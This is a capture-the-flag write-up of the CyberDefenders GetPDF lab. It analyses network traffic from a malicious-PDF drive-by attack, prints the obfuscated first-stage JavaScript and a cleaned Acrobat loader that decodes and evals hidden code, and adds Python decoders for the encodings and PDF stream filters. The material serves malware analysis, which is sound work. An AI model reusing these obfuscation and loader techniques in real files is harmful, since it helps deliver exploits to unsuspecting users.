CyberDefenders — GetPDF Lab

jon
Nov 4, 2024


Scenario: The PDF format is the de-facto standard for exchanging documents online. Such popularity, however, has also attracted cyber criminals, who use it to spread malware to unsuspecting users. The ability to generate malicious PDF files that distribute malware has been built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF has become quite a successful attack vector.
The network traffic captured in lala.pcap contains traffic from a typical malicious PDF attack, in which an unsuspecting user opens a compromised web page that redirects the user’s browser to the URL of a malicious PDF file. As the browser’s PDF plug-in opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.

As a SOC analyst, analyze the PDF and answer the questions.

How many URL path(s) are involved in this incident?

This is most likely HTTP traffic; filtering on HTTP requests shows 6 unique HTTP requests:

What is the URL which contains the JS code?

Following the HTTP stream, we can see the server packets, and the JS code is included in the server response:

What is the URL hidden in the JS code?

Using de4js, the script can be decoded to:

var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;
XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');
ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;
XadHef = 78;
var BeZao = 47;
BeZao += -47;
var FeceSabejo = -46;
FeceSabejo += 48;
GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');
MaqTa = 5;
GaDemee = DepanNegw[GaDemee];
SeWajec = SerayYafags[SeWajec];
for (YajMedei = BeZao; YajMedei < DayahDet.length - 1; YajMedei += FeceSabejo) ZeJexn += SeWajec(MezRai((DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) + (DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn), KesXanavn));
GaDemee(ZeJexn)

The decoded script contains no literal URL or indicator, but the request that follows it in the capture is a GET for a URL; that is the URL hidden in the script above.
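The obfuscation above hides its identifiers behind regex strips and encodes its payload as word lengths. As an added example (my code, not the lab's, de4js's or the author's), this Python reimplements both steps statically so the payload can be recovered without ever running it; the sample words are the first 32 entries of DayahDet from the script above.

```python
import re

def strip_chars(masked: str, junk: str) -> str:
    # Mirrors 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, ''): dropping every character
    # of the junk class leaves the real identifier the script wants to call.
    return re.sub("[" + re.escape(junk) + "]", "", masked)

def decode_word_lengths(words, offset=1, step=2, base=16) -> str:
    # Mirrors the for-loop once its arithmetic is folded: BeZao = 0, DexeTelae = 1,
    # FeceSabejo = 2, KesXanavn = 16. Each pair of words encodes one character:
    # (len(word) - 1) in hex is the high digit, the same for the next word is the
    # low digit, and the two digits are parsed back as one char code.
    out = []
    for i in range(0, len(words) - 1, step):
        hi = format(len(words[i]) - 1, "x")
        lo = format(len(words[i + offset]) - 1, "x")
        out.append(chr(int(hi + lo, base)))
    return "".join(out)

# The first 32 words of DayahDet from the script above; the full list decodes to
# the string that GaDemee (window.eval) finally executes.
SAMPLE_WORDS = ("zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa "
                "xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap "
                "def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele "
                "xelawece denew jafelev haweqa kel vatabaser mag vejefama").split(" ")

def recovered_identifiers():
    # The two regex-masked names from the script: window[...] and String[...].
    return (strip_chars("e5vfqaIVblI5", "5fqIVbI5"),
            strip_chars("ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD", "t9wgBwJW56ixPRs1ZnjHjjKuMkD"))

if __name__ == "__main__":
    print(recovered_identifiers())            # ('eval', 'fromCharCode')
    print(decode_word_lengths(SAMPLE_WORDS))  # document.write('
```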

What is the MD5 hash of the PDF file contained in the packet?

Using Wireshark’s HTTP export objects, the PDF that can be exported is fcexploit.pdf. Run md5sum on it to get the hash.

How many object(s) are contained inside the PDF file?

I used the pdfid.py tool to count all the PDF objects:

How many filtering schemes are used for the object streams?

What is the number of the ‘object stream’ that might contain malicious JS code?

Answering both questions together: first locate all streams, then focus on the JS ones using peepdf:

With pdf-parser we can take a look at JavaScript stream 4, which references stream 5. This answers both questions. There are 4 different filters used: “/FlateDecode /ASCII85Decode /LZWDecode /RunLengthDecode”, and the malicious JS code is in stream 5.
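A reader applies the filters in the order the /Filter array lists them, so the stream has to be unwrapped the same way before the JS is readable. As an added example (my code, not the lab's, pdf-parser's or peepdf's), this Python decodes such a four-filter chain, implementing LZWDecode and RunLengthDecode by hand because the standard library lacks them; the sample stream is constructed here, not taken from fcexploit.pdf.

```python
import base64, zlib
def lzw_decode(data: bytes) -> bytes:
    # PDF LZWDecode: MSB-first 9..12-bit codes, 256 = clear, 257 = EOD, EarlyChange=1 (PDF default).
    table = [bytes([i]) for i in range(256)] + [b"", b""]
    out, prev, width, buf, nbits = bytearray(), None, 9, 0, 0
    for byte in data:
        buf, nbits = (buf << 8) | byte, nbits + 8
        while nbits >= width:
            nbits -= width
            code, buf = buf >> nbits, buf & ((1 << nbits) - 1)
            if code == 256:
                table, prev, width = table[:258], None, 9
                continue
            if code == 257:
                return bytes(out)
            if code > len(table) or (code == len(table) and prev is None):
                raise ValueError("corrupt LZW code %d" % code)
            entry = table[code] if code < len(table) else prev + prev[:1]  # KwKwK case
            out += entry
            if prev is not None:
                table.append(prev + entry[:1])
            prev = entry
            if len(table) + 1 >= (1 << width) and width < 12:
                width += 1
    return bytes(out)

def runlength_decode(data: bytes) -> bytes:
    # PDF RunLengthDecode: n < 128 copies n+1 literals, n > 128 repeats one byte 257-n times, 128 = EOD.
    out, i = bytearray(), 0
    while i < len(data) and data[i] != 128:
        n = data[i]
        out += data[i + 1:i + 2 + n] if n < 128 else data[i + 1:i + 2] * (257 - n)
        i += 2 + n if n < 128 else 2
    return bytes(out)

# Apply the /Filter array in the order listed, exactly as a PDF reader does.
FILTERS = {"/FlateDecode": zlib.decompress, "/LZWDecode": lzw_decode,
           "/ASCII85Decode": lambda d: base64.a85decode(d, adobe=True),
           "/RunLengthDecode": runlength_decode}

def decode_stream(raw: bytes, filters: list) -> bytes:
    for name in filters:
        raw = FILTERS[name](raw)
    return raw
# Constructed sample, not from the lab: b"ABCXXXX" run-length encoded to 02 41 42 43 FD 58 80,
# then LZW-encoded by hand as 9-bit codes CLEAR,2,65,66,67,253,88,128,EOD; ASCII85 and Flate follow.
SAMPLE_LZW = bytes.fromhex("80008824221bf4b0808080")
SAMPLE_STREAM = zlib.compress(base64.a85encode(SAMPLE_LZW, adobe=True))
SAMPLE_FILTERS = ["/FlateDecode", "/ASCII85Decode", "/LZWDecode", "/RunLengthDecode"]
```

`decode_stream(SAMPLE_STREAM, SAMPLE_FILTERS)` returns `b"ABCXXXX"`; point it at the raw bytes between `stream` and `endstream` of a real object and the filter names from its dictionary.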

Analyzing the PDF file, what ‘object-streams’ contain the JS code responsible for executing the shellcodes? The JS code is divided into two streams. Format: two numbers separated with ‘,’. Put the numbers in ascending order.

Looking through the streams, two have a large length and both use the 4 filters; these are the shellcode streams:

The JS code responsible for executing the exploit contains shellcodes that drop malicious executable files. What is the full path of malicious executable files after being dropped by the malware on the victim machine?

To find the shellcode, let’s first clean up the JS code:

var SSS = null;
var SS = 'eval';
var $S = '';
$5 = 'info';
app.doc.syncAnnotScan();                        // make sure annotations are loaded
S$ = 'title';
if (app.plugIns.length != 0) {                  // plug-in count doubles as a sandbox check
    var $$ = 0;
    ____SSS = app.doc.getAnnots({ nPage: 0 });  // fetch page-1 annotations for the next stage
    $S = this.info.title;                       // the document title carries the encoded code
}
var S5 = '';
if (app.plugIns.length > 3) {
    var arr = $S.split(/U_155bf62c9aU_7917ab39/);   // marker string separates the hex bytes
    for (var $ = 1; $ < arr.length; $++) {
        S5 += String.fromCharCode('0x' + arr[$]);   // each chunk is one hex char code
    }
}
if (app.plugIns.length >= 2) {
    app[SS](S5);                                // app.eval(decoded second stage)
}

Of note are the marker string “U_155bf62c9aU_7917ab39” and the call to “getAnnots”, which returns the page’s annotation objects; those annotations are what we examine next in the PDF. We were also able to resolve the variables eval, info, and title.

Using the tree command in pdfid.py, we can view the different annots. We want to focus on streams 7 and 9, the streams we previously noted as malicious and related to shellcode:

Stream 7:

Stream 9:

Info (stream 10):

In stream 10 the same string is repeated over and over; replacing it with nothing reveals something that resembles code:

Using this code, we can trace it back to stream 9 by the string “X_17844743X_170987743” and to stream 7 by the string “89af50d”. Now we can build our decoding formula for both streams:
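The decoding formula in the cleaned script is split on the marker, skip the first chunk, then hex to character. As an added example (my code, not the lab's or the author's), this Python reimplements it statically alongside the marker-stripping step used on stream 10; the marker is the one from the script above, the title is constructed here, and the other marker strings the writeup names can be passed the same way.

```python
DELIM = "U_155bf62c9aU_7917ab39"   # marker from the first-stage script above

def decode_delimited_hex(blob: str, delimiter: str) -> str:
    # Mirrors: arr = $S.split(/DELIM/); for ($ = 1; ...) S5 += String.fromCharCode('0x' + arr[$]);
    # Element 0 (whatever precedes the first marker) is skipped because the loop starts at 1;
    # an empty chunk would give fromCharCode(NaN) = '\x00' in JS, so those are dropped too.
    chunks = blob.split(delimiter)[1:]
    return "".join(chr(int(c, 16)) for c in chunks if c)

def strip_filler(text: str, filler: str) -> str:
    # The stream-10 trick: one string repeated everywhere; removing it exposes the code.
    return text.replace(filler, "")

# Constructed sample (not the lab's real /Title): a harmless statement, each byte
# written as hex behind the marker, prefixed by an innocent-looking title.
SAMPLE_TITLE = "Invoice" + "".join(DELIM + format(ord(ch), "x") for ch in "var x = 1;")

if __name__ == "__main__":
    print(decode_delimited_hex(SAMPLE_TITLE, DELIM))  # var x = 1;
```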

Using scdbg, we can take one of the shellcodes and run it to see what it contains. The executable path is included in the shellcode.

The PDF file contains another exploit related to CVE-2010-0188. What is the URL of the malicious executable that the shellcode associated with this exploit drops?

The hints could be used to solve this one, but the URL can also be found in the Wireshark traffic:

How many CVEs are included in the PDF file?

Researching online, the 4 shellcodes and the CVE from the previous question total 5 CVEs.
